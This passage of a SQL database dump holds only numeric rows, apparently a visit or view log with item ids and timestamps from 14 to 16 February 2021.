15:18:45'),(13333,2309,1,'2021-02-14','2021-02-14 15:18:46'),(13334,2309,1,'2021-02-14','2021-02-14 15:22:31'),(13335,1586,1,'2021-02-14','2021-02-14 15:24:38'),(13336,1610,1,'2021-02-14','2021-02-14 15:32:39'),(13337,2159,1,'2021-02-14','2021-02-14 15:41:00'),(13338,2769,1,'2021-02-14','2021-02-14 15:42:40'),(13339,1709,1,'2021-02-14','2021-02-14 15:42:42'),(13340,1604,1,'2021-02-14','2021-02-14 15:44:29'),(13341,2609,1,'2021-02-14','2021-02-14 15:52:40'),(13342,470,1,'2021-02-14','2021-02-14 15:56:56'),(13343,3251,1,'2021-02-14','2021-02-14 16:00:21'),(13344,3096,1,'2021-02-14','2021-02-14 16:00:22'),(13345,1544,1,'2021-02-14','2021-02-14 16:02:42'),(13346,1598,1,'2021-02-14','2021-02-14 16:02:47'),(13347,3257,1,'2021-02-14','2021-02-14 16:04:47'),(13348,2309,1,'2021-02-14','2021-02-14 16:04:50'),(13349,1586,1,'2021-02-14','2021-02-14 16:05:37'),(13350,1720,1,'2021-02-14','2021-02-14 16:06:05'),(13351,1600,1,'2021-02-14','2021-02-14 16:14:51'),(13352,2420,1,'2021-02-14','2021-02-14 16:16:57'),(13353,1718,1,'2021-02-14','2021-02-14 16:22:51'),(13354,473,1,'2021-02-14','2021-02-14 16:23:06'),(13355,2769,1,'2021-02-14','2021-02-14 16:24:59'),(13356,3099,1,'2021-02-14','2021-02-14 16:27:07'),(13357,2178,1,'2021-02-14','2021-02-14 16:32:49'),(13358,1606,1,'2021-02-14','2021-02-14 16:32:53'),(13359,1594,1,'2021-02-14','2021-02-14 16:34:27'),(13360,1602,1,'2021-02-14','2021-02-14 16:34:33'),(13361,1749,1,'2021-02-14','2021-02-14 16:36:14'),(13362,2775,1,'2021-02-14','2021-02-14 16:43:09'),(13363,2178,1,'2021-02-14','2021-02-14 16:44:46'),(13364,3107,1,'2021-02-14','2021-02-14 16:56:12'),(13365,483,1,'2021-02-14','2021-02-14 16:57:18'),(13366,2801,1,'2021-02-14','2021-02-14 17:07:07'),(13367,108,1,'2021-02-14','2021-02-14 17:12:51'),(13368,2751,1,'2021-02-14','2021-02-14 17:17:08'),(13369,2813,1,'2021-02-14','2021-02-14 17:17:59'),(13370,2063,1,'2021-02-14','2021-02-14 17:19:17'),(13371,468,1,'2021-02-14','2021-02-14 17:22:52'),(13372,2804,1,'2021-02-14','2021-02-14 17:28:35'),(13373,3287,1,'2021-02-14','2021-02-14 17:29:14'),(13374,2420,1,'2021-02-14','2021-02-14 17:32:49'),(13375,3127,1,'2021-02-14','2021-02-14 17:33:22'),(13376,3087,1,'2021-02-14','2021-02-14 17:35:39'),(13377,1594,1,'2021-02-14','2021-02-14 17:35:44'),(13378,91,1,'2021-02-14','2021-02-14 17:43:02'),(13379,2410,1,'2021-02-14','2021-02-14 17:44:45'),(13380,3005,1,'2021-02-14','2021-02-14 17:46:24'),(13381,1604,1,'2021-02-14','2021-02-14 17:58:08'),(13382,1612,1,'2021-02-14','2021-02-14 18:04:52'),(13383,3267,1,'2021-02-14','2021-02-14 18:05:02'),(13384,2989,1,'2021-02-14','2021-02-14 18:06:31'),(13385,1741,1,'2021-02-14','2021-02-14 18:08:49'),(13386,2956,1,'2021-02-14','2021-02-14 18:11:42'),(13387,1766,1,'2021-02-14','2021-02-14 18:13:00'),(13388,2804,1,'2021-02-14','2021-02-14 18:13:14'),(13389,1596,1,'2021-02-14','2021-02-14 18:14:49'),(13390,2457,1,'2021-02-14','2021-02-14 18:15:44'),(13391,1596,1,'2021-02-14','2021-02-14 18:25:30'),(13392,2609,1,'2021-02-14','2021-02-14 18:35:13'),(13393,2617,1,'2021-02-14','2021-02-14 18:36:55'),(13394,2165,1,'2021-02-14','2021-02-14 18:38:39'),(13395,3030,1,'2021-02-14','2021-02-14 18:41:43'),(13396,3083,1,'2021-02-14','2021-02-14 18:44:57'),(13397,1592,1,'2021-02-14','2021-02-14 18:45:36'),(13398,471,1,'2021-02-14','2021-02-14 18:45:57'),(13399,3034,1,'2021-02-14','2021-02-14 18:56:27'),(13400,3280,1,'2021-02-14','2021-02-14 18:56:38'),(13401,2410,1,'2021-02-14','2021-02-14 19:03:53'),(13402,2991,1,'2021-02-14','2021-02-14 19:04:47'),(13403,72,1,'2021-02-14','2021-02-14 19:13:45'),(13404,1780,1,'2021-02-14','2021-02-14 19:17:56'),(13405,3109,1,'2021-02-14','2021-02-14 19:23:31'),(13406,3316,1,'2021-02-14','2021-02-14 19:28:42'),(13407,3090,1,'2021-02-14','2021-02-14 19:31:30'),(13408,3285,1,'2021-02-14','2021-02-14 19:35:48'),(13409,3045,1,'2021-02-14','2021-02-14 19:40:34'),(13410,3430,1,'2021-02-14','2021-02-14 19:40:49'),(13411,3090,1,'2021-02-14','2021-02-14 19:41:55'),(13412,3180,1,'2021-02-14','2021-02-14 19:43:39'),(13413,3249,1,'2021-02-14','2021-02-14 19:52:45'),(13414,2490,1,'2021-02-14','2021-02-14 19:53:44'),(13415,3045,1,'2021-02-14','2021-02-14 19:54:03'),(13416,3083,1,'2021-02-14','2021-02-14 19:55:31'),(13417,1774,1,'2021-02-14','2021-02-14 19:58:44'),(13418,3051,1,'2021-02-14','2021-02-14 20:03:43'),(13419,2989,1,'2021-02-14','2021-02-14 20:05:22'),(13420,89,1,'2021-02-14','2021-02-14 20:08:49'),(13421,485,1,'2021-02-14','2021-02-14 20:14:06'),(13422,2911,1,'2021-02-14','2021-02-14 20:16:36'),(13423,3438,1,'2021-02-14','2021-02-14 20:23:12'),(13424,1724,1,'2021-02-14','2021-02-14 20:24:00'),(13425,72,1,'2021-02-14','2021-02-14 20:26:08'),(13426,1870,1,'2021-02-14','2021-02-14 20:34:13'),(13427,1610,1,'2021-02-14','2021-02-14 20:34:17'),(13428,89,1,'2021-02-14','2021-02-14 20:35:56'),(13429,1600,1,'2021-02-14','2021-02-14 20:39:27'),(13430,3482,1,'2021-02-14','2021-02-14 20:40:16'),(13431,3489,1,'2021-02-14','2021-02-14 20:40:36'),(13432,3273,1,'2021-02-14','2021-02-14 20:44:01'),(13433,477,1,'2021-02-14','2021-02-14 20:54:07'),(13434,74,1,'2021-02-14','2021-02-14 20:54:10'),(13435,3060,1,'2021-02-14','2021-02-14 20:55:59'),(13436,3069,1,'2021-02-14','2021-02-14 21:02:22'),(13437,68,1,'2021-02-14','2021-02-14 21:03:52'),(13438,1737,1,'2021-02-14','2021-02-14 21:13:51'),(13439,1590,1,'2021-02-14','2021-02-14 21:18:05'),(13440,1766,1,'2021-02-14','2021-02-14 21:25:43'),(13441,76,1,'2021-02-14','2021-02-14 21:27:25'),(13442,335,1,'2021-02-14','2021-02-14 21:36:19'),(13443,2809,1,'2021-02-14','2021-02-14 21:36:57'),(13444,3259,1,'2021-02-14','2021-02-14 21:44:24'),(13445,2964,1,'2021-02-14','2021-02-14 21:54:34'),(13446,1877,1,'2021-02-14','2021-02-14 22:08:44'),(13447,2775,1,'2021-02-14','2021-02-14 22:14:34'),(13448,1701,1,'2021-02-14','2021-02-14 22:17:22'),(13449,2150,1,'2021-02-14','2021-02-14 22:32:01'),(13450,2558,1,'2021-02-14','2021-02-14 22:34:32'),(13451,2508,1,'2021-02-14','2021-02-14 22:44:30'),(13452,3226,1,'2021-02-14','2021-02-14 22:58:46'),(13453,3027,1,'2021-02-14','2021-02-14 23:15:24'),(13454,1594,1,'2021-02-14','2021-02-14 23:16:59'),(13455,1728,1,'2021-02-14','2021-02-14 23:19:18'),(13456,1600,1,'2021-02-14','2021-02-14 23:25:10'),(13457,570,1,'2021-02-14','2021-02-14 23:34:55'),(13458,1588,1,'2021-02-14','2021-02-14 23:37:00'),(13459,1582,1,'2021-02-14','2021-02-14 23:39:30'),(13460,1870,1,'2021-02-14','2021-02-14 23:45:00'),(13461,486,1,'2021-02-14','2021-02-14 23:46:51'),(13462,2658,1,'2021-02-14','2021-02-14 23:50:07'),(13463,2309,1,'2021-02-14','2021-02-14 23:55:11'),(13464,91,1,'2021-02-15','2021-02-15 00:05:27'),(13465,2751,1,'2021-02-15','2021-02-15 00:07:08'),(13466,3263,1,'2021-02-15','2021-02-15 00:08:58'),(13467,1726,1,'2021-02-15','2021-02-15 00:15:12'),(13468,3275,1,'2021-02-15','2021-02-15 00:15:15'),(13469,470,1,'2021-02-15','2021-02-15 00:17:19'),(13470,467,1,'2021-02-15','2021-02-15 00:25:16'),(13471,2609,1,'2021-02-15','2021-02-15 00:25:18'),(13472,2309,1,'2021-02-15','2021-02-15 00:26:43'),(13473,2956,1,'2021-02-15','2021-02-15 00:30:59'),(13474,2159,1,'2021-02-15','2021-02-15 00:35:11'),(13475,1586,1,'2021-02-15','2021-02-15 00:37:28'),(13476,1598,1,'2021-02-15','2021-02-15 00:39:33'),(13477,87,1,'2021-02-15','2021-02-15 00:45:12'),(13478,2769,1,'2021-02-15','2021-02-15 00:45:19'),(13479,3097,1,'2021-02-15','2021-02-15 00:45:41'),(13480,106,1,'2021-02-15','2021-02-15 00:59:41'),(13481,3245,1,'2021-02-15','2021-02-15 01:05:25'),(13482,1713,1,'2021-02-15','2021-02-15 01:05:37'),(13483,3285,1,'2021-02-15','2021-02-15 01:05:55'),(13484,3251,1,'2021-02-15','2021-02-15 01:13:50'),(13485,2152,1,'2021-02-15','2021-02-15 01:15:23'),(13486,2419,1,'2021-02-15','2021-02-15 01:25:36'),(13487,2813,1,'2021-02-15','2021-02-15 01:27:55'),(13488,1770,1,'2021-02-15','2021-02-15 01:29:48'),(13489,3263,1,'2021-02-15','2021-02-15 01:35:46'),(13490,2911,1,'2021-02-15','2021-02-15 01:37:48'),(13491,2156,1,'2021-02-15','2021-02-15 01:44:57'),(13492,3124,1,'2021-02-15','2021-02-15 02:03:31'),(13493,2159,1,'2021-02-15','2021-02-15 02:03:48'),(13494,1730,1,'2021-02-15','2021-02-15 02:06:03'),(13495,468,1,'2021-02-15','2021-02-15 02:08:09'),(13496,478,1,'2021-02-15','2021-02-15 02:15:53'),(13497,468,1,'2021-02-15','2021-02-15 02:25:51'),(13498,2751,1,'2021-02-15','2021-02-15 02:25:59'),(13499,1606,1,'2021-02-15','2021-02-15 02:26:02'),(13500,3087,1,'2021-02-15','2021-02-15 02:28:38'),(13501,1604,1,'2021-02-15','2021-02-15 02:35:54'),(13502,3269,1,'2021-02-15','2021-02-15 02:35:55'),(13503,1594,1,'2021-02-15','2021-02-15 02:40:56'),(13504,1745,1,'2021-02-15','2021-02-15 02:47:46'),(13505,479,1,'2021-02-15','2021-02-15 02:49:25'),(13506,3127,1,'2021-02-15','2021-02-15 02:52:54'),(13507,476,1,'2021-02-15','2021-02-15 02:56:12'),(13508,3006,1,'2021-02-15','2021-02-15 02:56:17'),(13509,3249,1,'2021-02-15','2021-02-15 03:04:17'),(13510,2617,1,'2021-02-15','2021-02-15 03:08:18'),(13511,1718,1,'2021-02-15','2021-02-15 03:16:22'),(13512,1705,1,'2021-02-15','2021-02-15 03:16:28'),(13513,1586,1,'2021-02-15','2021-02-15 03:24:34'),(13514,1707,1,'2021-02-15','2021-02-15 03:25:37'),(13515,1718,1,'2021-02-15','2021-02-15 03:26:31'),(13516,1596,1,'2021-02-15','2021-02-15 03:26:33'),(13517,1707,1,'2021-02-15','2021-02-15 03:26:36'),(13518,1586,1,'2021-02-15','2021-02-15 03:27:24'),(13519,1713,1,'2021-02-15','2021-02-15 03:29:46'),(13520,1586,1,'2021-02-15','2021-02-15 03:34:09'),(13521,1697,1,'2021-02-15','2021-02-15 03:34:23'),(13522,1586,1,'2021-02-15','2021-02-15 03:35:31'),(13523,1699,1,'2021-02-15','2021-02-15 03:35:48'),(13524,1586,1,'2021-02-15','2021-02-15 03:36:33'),(13525,1705,1,'2021-02-15','2021-02-15 03:37:59'),(13526,1592,1,'2021-02-15','2021-02-15 03:38:45'),(13527,3034,1,'2021-02-15','2021-02-15 03:41:32'),(13528,3280,1,'2021-02-15','2021-02-15 03:41:38'),(13529,91,1,'2021-02-15','2021-02-15 03:44:32'),(13530,3030,1,'2021-02-15','2021-02-15 03:47:52'),(13531,3034,1,'2021-02-15','2021-02-15 03:50:15'),(13532,2296,1,'2021-02-15','2021-02-15 03:58:26'),(13533,2956,1,'2021-02-15','2021-02-15 03:58:48'),(13534,2965,1,'2021-02-15','2021-02-15 03:59:21'),(13535,3072,1,'2021-02-15','2021-02-15 04:04:43'),(13536,2704,1,'2021-02-15','2021-02-15 04:16:48'),(13537,1612,1,'2021-02-15','2021-02-15 04:18:54'),(13538,89,1,'2021-02-15','2021-02-15 04:28:40'),(13539,1749,1,'2021-02-15','2021-02-15 04:36:32'),(13540,2989,1,'2021-02-15','2021-02-15 04:36:34'),(13541,1739,1,'2021-02-15','2021-02-15 04:40:53'),(13542,72,1,'2021-02-15','2021-02-15 04:46:42'),(13543,3045,1,'2021-02-15','2021-02-15 04:49:59'),(13544,3051,1,'2021-02-15','2021-02-15 04:50:41'),(13545,3005,1,'2021-02-15','2021-02-15 04:50:56'),(13546,80,1,'2021-02-15','2021-02-15 04:56:44'),(13547,1872,1,'2021-02-15','2021-02-15 04:58:33'),(13548,3267,1,'2021-02-15','2021-02-15 05:01:23'),(13549,3053,1,'2021-02-15','2021-02-15 05:06:56'),(13550,80,1,'2021-02-15','2021-02-15 05:07:29'),(13551,3127,1,'2021-02-15','2021-02-15 05:14:50'),(13552,2178,1,'2021-02-15','2021-02-15 05:17:02'),(13553,1602,1,'2021-02-15','2021-02-15 05:19:22'),(13554,2813,1,'2021-02-15','2021-02-15 05:35:23'),(13555,2420,1,'2021-02-15','2021-02-15 05:37:10'),(13556,1610,1,'2021-02-15','2021-02-15 05:39:16'),(13557,473,1,'2021-02-15','2021-02-15 05:41:11'),(13558,3099,1,'2021-02-15','2021-02-15 05:48:34'),(13559,477,1,'2021-02-15','2021-02-15 05:52:12'),(13560,3107,1,'2021-02-15','2021-02-15 05:57:38'),(13561,3251,1,'2021-02-15','2021-02-15 06:07:00'),(13562,1703,1,'2021-02-15','2021-02-15 06:07:21'),(13563,477,1,'2021-02-15','2021-02-15 06:17:29'),(13564,3430,1,'2021-02-15','2021-02-15 06:22:45'),(13565,3257,1,'2021-02-15','2021-02-15 06:27:23'),(13566,2411,1,'2021-02-15','2021-02-15 06:30:11'),(13567,3175,1,'2021-02-15','2021-02-15 06:37:24'),(13568,1703,1,'2021-02-15','2021-02-15 06:50:56'),(13569,2804,1,'2021-02-15','2021-02-15 06:53:30'),(13570,3181,1,'2021-02-15','2021-02-15 06:59:40'),(13571,1724,1,'2021-02-15','2021-02-15 07:01:45'),(13572,1782,1,'2021-02-15','2021-02-15 07:07:59'),(13573,1584,1,'2021-02-15','2021-02-15 07:10:05'),(13574,3004,1,'2021-02-15','2021-02-15 07:12:08'),(13575,2178,1,'2021-02-15','2021-02-15 07:18:04'),(13576,2411,1,'2021-02-15','2021-02-15 07:20:10'),(13577,1614,1,'2021-02-15','2021-02-15 07:28:11'),(13578,1588,1,'2021-02-15','2021-02-15 07:28:15'),(13579,3287,1,'2021-02-15','2021-02-15 07:29:42'),(13580,3053,1,'2021-02-15','2021-02-15 07:30:03'),(13581,1610,1,'2021-02-15','2021-02-15 07:34:57'),(13582,2558,1,'2021-02-15','2021-02-15 07:38:14'),(13583,1870,1,'2021-02-15','2021-02-15 07:38:15'),(13584,473,1,'2021-02-15','2021-02-15 07:39:55'),(13585,2934,1,'2021-02-15','2021-02-15 07:41:36'),(13586,1610,1,'2021-02-15','2021-02-15 07:43:18'),(13587,1600,1,'2021-02-15','2021-02-15 07:52:03'),(13588,1711,1,'2021-02-15','2021-02-15 07:52:48'),(13589,2769,1,'2021-02-15','2021-02-15 07:59:12'),(13590,2410,1,'2021-02-15','2021-02-15 08:10:41'),(13591,1586,1,'2021-02-15','2021-02-15 08:12:33'),(13592,1766,1,'2021-02-15','2021-02-15 08:12:52'),(13593,84,1,'2021-02-15','2021-02-15 08:14:22'),(13594,87,1,'2021-02-15','2021-02-15 08:14:32'),(13595,91,1,'2021-02-15','2021-02-15 08:14:50'),(13596,68,1,'2021-02-15','2021-02-15 08:15:45'),(13597,76,1,'2021-02-15','2021-02-15 08:15:54'),(13598,2457,1,'2021-02-15','2021-02-15 08:16:11'),(13599,1586,1,'2021-02-15','2021-02-15 08:18:37'),(13600,3063,1,'2021-02-15','2021-02-15 08:25:57'),(13601,570,1,'2021-02-15','2021-02-15 08:31:12'),(13602,3259,1,'2021-02-15','2021-02-15 08:33:11'),(13603,1594,1,'2021-02-15','2021-02-15 08:38:36'),(13604,2309,1,'2021-02-15','2021-02-15 08:38:38'),(13605,2420,1,'2021-02-15','2021-02-15 08:48:48'),(13606,76,1,'2021-02-15','2021-02-15 08:58:47'),(13607,1596,1,'2021-02-15','2021-02-15 09:00:56'),(13608,481,1,'2021-02-15','2021-02-15 09:02:50'),(13609,3280,1,'2021-02-15','2021-02-15 09:10:33'),(13610,2964,1,'2021-02-15','2021-02-15 09:18:13'),(13611,74,1,'2021-02-15','2021-02-15 09:20:21'),(13612,3489,1,'2021-02-15','2021-02-15 09:20:58'),(13613,1872,1,'2021-02-15','2021-02-15 09:22:27'),(13614,3104,1,'2021-02-15','2021-02-15 09:22:29'),(13615,1606,1,'2021-02-15','2021-02-15 09:27:02'),(13616,68,1,'2021-02-15','2021-02-15 09:28:13'),(13617,2609,1,'2021-02-15','2021-02-15 09:31:03'),(13618,2159,1,'2021-02-15','2021-02-15 09:38:05'),(13619,3285,1,'2021-02-15','2021-02-15 09:49:10'),(13620,481,1,'2021-02-15','2021-02-15 09:49:49'),(13621,3083,1,'2021-02-15','2021-02-15 09:53:20'),(13622,3307,1,'2021-02-15','2021-02-15 09:54:29'),(13623,335,1,'2021-02-15','2021-02-15 09:58:14'),(13624,68,1,'2021-02-15','2021-02-15 10:02:27'),(13625,2809,1,'2021-02-15','2021-02-15 10:02:54'),(13626,3079,1,'2021-02-15','2021-02-15 10:05:45'),(13627,2309,1,'2021-02-15','2021-02-15 10:13:32'),(13628,1606,1,'2021-02-15','2021-02-15 10:14:28'),(13629,2989,1,'2021-02-15','2021-02-15 10:15:24'),(13630,2993,1,'2021-02-15','2021-02-15 10:22:10'),(13631,1737,1,'2021-02-15','2021-02-15 10:26:02'),(13632,1598,1,'2021-02-15','2021-02-15 10:30:26'),(13633,3253,1,'2021-02-15','2021-02-15 10:31:16'),(13634,3097,1,'2021-02-15','2021-02-15 10:38:03'),(13635,3063,1,'2021-02-15','2021-02-15 10:42:58'),(13636,2503,1,'2021-02-15','2021-02-15 10:44:19'),(13637,1598,1,'2021-02-15','2021-02-15 10:45:57'),(13638,1582,1,'2021-02-15','2021-02-15 10:50:01'),(13639,484,1,'2021-02-15','2021-02-15 10:56:55'),(13640,2557,1,'2021-02-15','2021-02-15 10:58:05'),(13641,3486,1,'2021-02-15','2021-02-15 11:08:07'),(13642,3023,1,'2021-02-15','2021-02-15 11:10:39'),(13643,2609,1,'2021-02-15','2021-02-15 11:18:27'),(13644,3069,1,'2021-02-15','2021-02-15 11:24:39'),(13645,1606,1,'2021-02-15','2021-02-15 11:28:37'),(13646,3083,1,'2021-02-15','2021-02-15 11:28:41'),(13647,3247,1,'2021-02-15','2021-02-15 11:29:12'),(13648,3243,1,'2021-02-15','2021-02-15 11:30:20'),(13649,2801,1,'2021-02-15','2021-02-15 11:33:06'),(13650,2751,1,'2021-02-15','2021-02-15 11:38:43'),(13651,1600,1,'2021-02-15','2021-02-15 11:42:24'),(13652,3087,1,'2021-02-15','2021-02-15 11:51:09'),(13653,2658,1,'2021-02-15','2021-02-15 12:01:00'),(13654,3313,1,'2021-02-15','2021-02-15 12:05:12'),(13655,2617,1,'2021-02-15','2021-02-15 12:09:34'),(13656,1701,1,'2021-02-15','2021-02-15 12:10:39'),(13657,1870,1,'2021-02-15','2021-02-15 12:17:04'),(13658,3316,1,'2021-02-15','2021-02-15 12:18:53'),(13659,2410,1,'2021-02-15','2021-02-15 12:19:22'),(13660,3273,1,'2021-02-15','2021-02-15 12:20:58'),(13661,3278,1,'2021-02-15','2021-02-15 12:23:36'),(13662,1596,1,'2021-02-15','2021-02-15 12:29:09'),(13663,3087,1,'2021-02-15','2021-02-15 12:35:50'),(13664,1544,1,'2021-02-15','2021-02-15 12:39:12'),(13665,1718,1,'2021-02-15','2021-02-15 12:39:15'),(13666,3034,1,'2021-02-15','2021-02-15 12:45:31'),(13667,1592,1,'2021-02-15','2021-02-15 12:49:20'),(13668,1604,1,'2021-02-15','2021-02-15 12:49:48'),(13669,1780,1,'2021-02-15','2021-02-15 12:51:24'),(13670,1604,1,'2021-02-15','2021-02-15 12:52:03'),(13671,570,1,'2021-02-15','2021-02-15 12:59:17'),(13672,1774,1,'2021-02-15','2021-02-15 13:02:08'),(13673,1598,1,'2021-02-15','2021-02-15 13:02:56'),(13674,3045,1,'2021-02-15','2021-02-15 13:10:39'),(13675,80,1,'2021-02-15','2021-02-15 13:29:29'),(13676,3053,1,'2021-02-15','2021-02-15 13:32:50'),(13677,2617,1,'2021-02-15','2021-02-15 13:34:29'),(13678,2989,1,'2021-02-15','2021-02-15 13:34:41'),(13679,3438,1,'2021-02-15','2021-02-15 13:35:30'),(13680,84,1,'2021-02-15','2021-02-15 13:36:08'),(13681,3005,1,'2021-02-15','2021-02-15 13:39:15'),(13682,72,1,'2021-02-15','2021-02-15 13:39:20'),(13683,3271,1,'2021-02-15','2021-02-15 13:41:25'),(13684,89,1,'2021-02-15','2021-02-15 13:43:29'),(13685,3051,1,'2021-02-15','2021-02-15 13:49:23'),(13686,484,1,'2021-02-15','2021-02-15 13:51:07'),(13687,1596,1,'2021-02-15','2021-02-15 13:55:22'),(13688,1877,1,'2021-02-15','2021-02-15 13:59:51'),(13689,74,1,'2021-02-15','2021-02-15 14:01:14'),(13690,1741,1,'2021-02-15','2021-02-15 14:10:09'),(13691,76,1,'2021-02-15','2021-02-15 14:15:03'),(13692,3030,1,'2021-02-15','2021-02-15 14:18:08'),(13693,3251,1,'2021-02-15','2021-02-15 14:18:45'),(13694,3178,1,'2021-02-15','2021-02-15 14:22:03'),(13695,3102,1,'2021-02-15','2021-02-15 14:24:23'),(13696,3109,1,'2021-02-15','2021-02-15 14:29:57'),(13697,3005,1,'2021-02-15','2021-02-15 14:30:00'),(13698,2557,1,'2021-02-15','2021-02-15 14:34:21'),(13699,1602,1,'2021-02-15','2021-02-15 14:40:16'),(13700,1594,1,'2021-02-15','2021-02-15 14:41:05'),(13701,1594,1,'2021-02-15','2021-02-15 14:41:08'),(13702,2178,1,'2021-02-15','2021-02-15 14:42:19'),(13703,89,1,'2021-02-15','2021-02-15 14:49:31'),(13704,1582,1,'2021-02-15','2021-02-15 14:49:40'),(13705,1612,1,'2021-02-15','2021-02-15 14:51:26'),(13706,89,1,'2021-02-15','2021-02-15 14:53:36'),(13707,1612,1,'2021-02-15','2021-02-15 14:54:24'),(13708,2748,1,'2021-02-15','2021-02-15 14:55:37'),(13709,1612,1,'2021-02-15','2021-02-15 14:56:14'),(13710,89,1,'2021-02-15','2021-02-15 14:56:19'),(13711,1612,1,'2021-02-15','2021-02-15 14:58:17'),(13712,473,1,'2021-02-15','2021-02-15 15:00:05'),(13713,3259,1,'2021-02-15','2021-02-15 15:00:08'),(13714,3107,1,'2021-02-15','2021-02-15 15:00:22'),(13715,1612,1,'2021-02-15','2021-02-15 15:03:14'),(13716,2911,1,'2021-02-15','2021-02-15 15:07:41'),(13717,2775,1,'2021-02-15','2021-02-15 15:10:05'),(13718,1697,1,'2021-02-15','2021-02-15 15:12:11'),(13719,1610,1,'2021-02-15','2021-02-15 15:20:15'),(13720,2309,1,'2021-02-15','2021-02-15 15:25:07'),(13721,3027,1,'2021-02-15','2021-02-15 15:26:26'),(13722,1718,1,'2021-02-15','2021-02-15 15:30:06'),(13723,1743,1,'2021-02-15','2021-02-15 15:30:11'),(13724,3257,1,'2021-02-15','2021-02-15 15:40:02'),(13725,472,1,'2021-02-15','2021-02-15 15:44:16'),(13726,2804,1,'2021-02-15','2021-02-15 15:47:50'),(13727,1606,1,'2021-02-15','2021-02-15 15:50:06'),(13728,3226,1,'2021-02-15','2021-02-15 15:55:44'),(13729,2804,1,'2021-02-15','2021-02-15 15:57:07'),(13730,477,1,'2021-02-15','2021-02-15 16:00:21'),(13731,1594,1,'2021-02-15','2021-02-15 16:01:45'),(13732,1697,1,'2021-02-15','2021-02-15 16:03:24'),(13733,2989,1,'2021-02-15','2021-02-15 16:05:25'),(13734,3267,1,'2021-02-15','2021-02-15 16:08:21'),(13735,3287,1,'2021-02-15','2021-02-15 16:17:59'),(13736,1606,1,'2021-02-15','2021-02-15 16:26:14'),(13737,1606,1,'2021-02-15','2021-02-15 16:26:14'),(13738,2658,1,'2021-02-15','2021-02-15 16:41:44'),(13739,1586,1,'2021-02-15','2021-02-15 16:42:02'),(13740,2956,1,'2021-02-15','2021-02-15 16:46:17'),(13741,3489,1,'2021-02-15','2021-02-15 16:46:18'),(13742,1699,1,'2021-02-15','2021-02-15 17:01:03'),(13743,3104,1,'2021-02-15','2021-02-15 17:01:39'),(13744,335,1,'2021-02-15','2021-02-15 17:02:45'),(13745,1594,1,'2021-02-15','2021-02-15 17:19:24'),(13746,1711,1,'2021-02-15','2021-02-15 17:25:56'),(13747,1588,1,'2021-02-15','2021-02-15 17:27:38'),(13748,2410,1,'2021-02-15','2021-02-15 17:32:36'),(13749,1766,1,'2021-02-15','2021-02-15 17:37:12'),(13750,2934,1,'2021-02-15','2021-02-15 17:38:01'),(13751,3229,1,'2021-02-15','2021-02-15 17:48:00'),(13752,2159,1,'2021-02-15','2021-02-15 17:54:12'),(13753,473,1,'2021-02-15','2021-02-15 18:02:09'),(13754,1707,1,'2021-02-15','2021-02-15 18:03:40'),(13755,3275,1,'2021-02-15','2021-02-15 18:06:20'),(13756,2769,1,'2021-02-15','2021-02-15 18:11:02'),(13757,2309,1,'2021-02-15','2021-02-15 18:14:33'),(13758,2558,1,'2021-02-15','2021-02-15 18:18:11'),(13759,1730,1,'2021-02-15','2021-02-15 18:19:16'),(13760,2775,1,'2021-02-15','2021-02-15 18:24:31'),(13761,1766,1,'2021-02-15','2021-02-15 18:26:34'),(13762,1870,1,'2021-02-15','2021-02-15 18:53:25'),(13763,1722,1,'2021-02-15','2021-02-15 18:54:29'),(13764,1586,1,'2021-02-15','2021-02-15 18:55:52'),(13765,3479,1,'2021-02-15','2021-02-15 18:57:30'),(13766,3045,1,'2021-02-15','2021-02-15 18:59:37'),(13767,76,1,'2021-02-15','2021-02-15 19:02:18'),(13768,2309,1,'2021-02-15','2021-02-15 19:13:51'),(13769,3107,1,'2021-02-15','2021-02-15 19:21:40'),(13770,3127,1,'2021-02-15','2021-02-15 19:26:36'),(13771,2934,1,'2021-02-15','2021-02-15 19:31:39'),(13772,74,1,'2021-02-15','2021-02-15 19:39:09'),(13773,3263,1,'2021-02-15','2021-02-15 19:42:52'),(13774,2309,1,'2021-02-15','2021-02-15 19:57:32'),(13775,1598,1,'2021-02-15','2021-02-15 20:18:18'),(13776,478,1,'2021-02-15','2021-02-15 20:21:29'),(13777,3280,1,'2021-02-15','2021-02-15 20:31:16'),(13778,1582,1,'2021-02-15','2021-02-15 20:41:27'),(13779,3087,1,'2021-02-15','2021-02-15 20:55:51'),(13780,3313,1,'2021-02-15','2021-02-15 20:58:45'),(13781,2419,1,'2021-02-15','2021-02-15 21:11:09'),(13782,1711,1,'2021-02-15','2021-02-15 21:17:11'),(13783,2609,1,'2021-02-15','2021-02-15 21:17:43'),(13784,2964,1,'2021-02-15','2021-02-15 21:18:03'),(13785,570,1,'2021-02-15','2021-02-15 21:29:33'),(13786,2813,1,'2021-02-15','2021-02-15 21:44:49'),(13787,3285,1,'2021-02-15','2021-02-15 21:49:08'),(13788,3087,1,'2021-02-15','2021-02-15 21:56:32'),(13789,470,1,'2021-02-15','2021-02-15 22:05:49'),(13790,1586,1,'2021-02-15','2021-02-15 22:12:03'),(13791,3273,1,'2021-02-15','2021-02-15 22:21:23'),(13792,3096,1,'2021-02-15','2021-02-15 22:25:25'),(13793,3097,1,'2021-02-15','2021-02-15 22:25:27'),(13794,3285,1,'2021-02-15','2021-02-15 22:33:59'),(13795,2419,1,'2021-02-15','2021-02-15 22:48:17'),(13796,1612,1,'2021-02-15','2021-02-15 22:49:45'),(13797,68,1,'2021-02-15','2021-02-15 22:52:23'),(13798,3097,1,'2021-02-15','2021-02-15 22:52:32'),(13799,1596,1,'2021-02-15','2021-02-15 22:52:45'),(13800,1612,1,'2021-02-15','2021-02-15 22:53:17'),(13801,3034,1,'2021-02-15','2021-02-15 22:56:15'),(13802,3243,1,'2021-02-15','2021-02-15 23:19:22'),(13803,1594,1,'2021-02-15','2021-02-15 23:20:56'),(13804,1594,1,'2021-02-15','2021-02-15 23:22:13'),(13805,570,1,'2021-02-15','2021-02-15 23:24:08'),(13806,1594,1,'2021-02-15','2021-02-15 23:24:40'),(13807,1594,1,'2021-02-15','2021-02-15 23:33:58'),(13808,3097,1,'2021-02-15','2021-02-15 23:35:13'),(13809,472,1,'2021-02-15','2021-02-15 23:35:59'),(13810,2617,1,'2021-02-15','2021-02-15 23:40:44'),(13811,2911,1,'2021-02-15','2021-02-15 23:53:55'),(13812,3058,1,'2021-02-15','2021-02-15 23:54:07'),(13813,3438,1,'2021-02-15','2021-02-15 23:54:12'),(13814,3053,1,'2021-02-16','2021-02-16 00:05:14'),(13815,72,1,'2021-02-16','2021-02-16 00:08:47'),(13816,2420,1,'2021-02-16','2021-02-16 00:12:46'),(13817,2609,1,'2021-02-16','2021-02-16 00:23:46'),(13818,80,1,'2021-02-16','2021-02-16 